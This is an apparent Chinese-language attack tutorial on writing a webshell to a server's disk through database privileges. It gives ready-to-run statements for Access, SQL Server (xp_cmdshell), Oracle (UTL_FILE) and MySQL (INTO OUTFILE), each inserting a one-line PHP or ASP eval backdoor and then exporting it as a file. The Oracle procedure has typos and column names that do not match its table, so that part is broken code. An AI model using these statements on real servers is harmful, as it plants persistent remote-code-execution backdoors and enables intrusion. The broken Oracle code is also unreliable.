简介

• 在控制了用户之后，利用用户的权限（如果比较大），就能够执行sql语句，并且导出WebShell。

步骤

• 建立表hack，设置字段名为cmd（text类型并不允许为空）；
• 向cmd字段插入字符串，此时字符串为一句话木马；
• 导出cmd字段的内容到硬盘；
• 删除表hack。

常用语句

Access

CREATE TABLE CMD (A VARCHAR(50))
INSERT INTO CMD (A) VALUES(‘<?php @eval($_POST[cheuhxg]);?>‘)
SELECT * INTO [A] IN ‘e:\web\webshellcc\1.asa;hack.xls‘ FROM CMD
DROP TABLE CMD

Access导出Shell只能配合IIS 6的解析漏洞。

SQL Server

EXEC master..xp_cmdshell ‘echo ^<%eval request("cheuhxg")%^> > c:\sql.txt‘

xp_cmdshell可以在SQL中运行系统命令行的系统存储过程，一般在安全级别较高的服务器上，建议关闭或限制访问权限。

Oracle

CREATE TABLE CMD(A NVARCHAR2(30) NOT NULL);
INSERT INTO CMD(A) VALUES(‘<%eval request("cheuhxg")%>‘);

CREATE DIRECTORY DIR_DUMP AS ‘d:/‘;				//生成文件盘符
GRANT READ,WRITE ON DIRECTORY DIR_DUMP TO PSBC;

//创建存储过程
CREATE OR REPLACE PROCEDUER OUTPUTSTR IS OUTPUTSTR_HANDLE UTL_FILE.file_type;
BEGIN
	OUTPUTSTR _HANDLE : UTL_FILE.FOPEN(‘DIR_DUMP‘,‘oracle.txt‘,‘w‘);
	FOR x IN (SELECT * FROM cmd) LOOP
		UTL_FILE.PUT_LINE(OUTPUTSTR _HANDLE,x.ID || ‘,‘ || x.RQ || ‘,‘);
    END LOOP;
    UTL_FILE.FCLOSE(OUTPUTSTR _HANDLE);
EXCEPTION WHEN OTHERS THEN
	DBMS_OUTPUT.PUT_LINE(SUBSTR(SQLERRM,1,2000));
END;

BEGIN 
	OUTPUTSTR									//调用存储过程
END;

MySQL

CREATE TABLE HACK (CMD TEXT NOT NULL);
INSERT INTO HACK (CMD) VALUES(‘<?php @eval($_POST[cheuhxg])?>‘);
SELECT CMD FROM HACK INTO OUTFILE ‘C:/eval.php‘;
DROP TABLE IF EXISTS HACK;

数据库导出WebShell